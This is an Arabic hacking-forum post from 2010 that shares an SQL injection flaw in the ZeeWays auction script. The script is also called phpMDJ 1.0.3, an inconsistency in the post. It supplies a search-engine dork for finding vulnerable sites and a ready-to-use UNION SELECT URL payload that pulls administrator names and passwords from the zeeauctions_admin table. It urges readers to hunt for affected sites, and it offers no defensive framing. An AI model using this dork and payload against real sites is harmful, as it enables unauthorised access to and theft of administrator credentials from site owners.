عرض مشاركة واحدة
قديم 01-11-2010, 12:39 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
M!M0
 
الصورة الرمزية M!M0
 

 

 
إحصائية العضو






M!M0 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
M!M0 is on a distinguished road

افتراضي ثغرة في ZeeWays Script


السلام عليكم ورحمة الله وبركاته

جبت لكم اليوم ثغرة في سكريبت phpMDJ 1.0.3

الثغرة من نوع SQL INJECTION

الذي يعشقها الكثير

نبدأ

دورك البحث عن المواقع المصابة

كود PHP:
Dork : [ inurl:"product_desc.php?id=" Powered by Zeeways.com 
طريقة الإستغلال
كود PHP:
http://server/auction/product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin-- 

الثغرة من إكتشاف الأخ SyRiAn_34G13

إن شاء الله تستفيدوا

موفقين بإذن الله ...


eyvm td ZeeWays Script

التوقيع


اعذروني لقلة قلامي..فالمدرسة تدمرني

http://img337.imageshack.us/img337/9193/kya54442.gif


M!M0==>معقد نفسيا ، مشتت ذهنيا منتحر علميا ، متورط عائليا مطلوب امنيا...,وماذا بعد؟

 

   

رد مع اقتباس